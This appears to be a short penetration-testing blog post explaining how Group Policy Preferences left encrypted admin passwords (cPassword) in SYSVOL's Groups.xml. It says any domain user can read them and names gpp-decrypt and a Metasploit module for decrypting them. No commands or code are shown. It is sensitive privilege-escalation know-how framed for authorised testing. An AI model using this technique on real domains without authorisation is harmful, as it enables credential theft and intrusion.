What are Group Policy Preferences?
While not used anymore due to the security risk they present GPP was used to embed user credentials into Group Policy Objects. This allowed for changes that required Admin credentials to be applied much easier. For example, mapping drives, creating local admin accounts, schedule tasks etc. All was well and good until the key to decrypt GPP stored credentials was leaked and allowed any attacker with access to the domain controller the ability to trivially decrypt administrator passwords used in GPP. Microsoft issued a patch( https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-025) however this only prevented new GPPs being created and does not remove GPPs prior to the patch. For this reason GPP should be added to your priv esc toolset when conducting windows penetration tests.
Accessing the stored GPP credentials
GPP stores the encrypted credentials in C:\Windows\Sysvol\ in a file name Groups.xml. To make matters worse SYSVOL is readable by any user on the domain and not just administrators so it is an easy win with low risk, high reward. The encrypted value is stored under cPassword in the Groups.xml file.
Decrypting the cPassword is as simple is inputting it into a tool called GPP-Decrypt:
Metasploit Module
Metasploit simplifies this process even further by including a post exploitation module to do the work for us.
No comments:
Post a Comment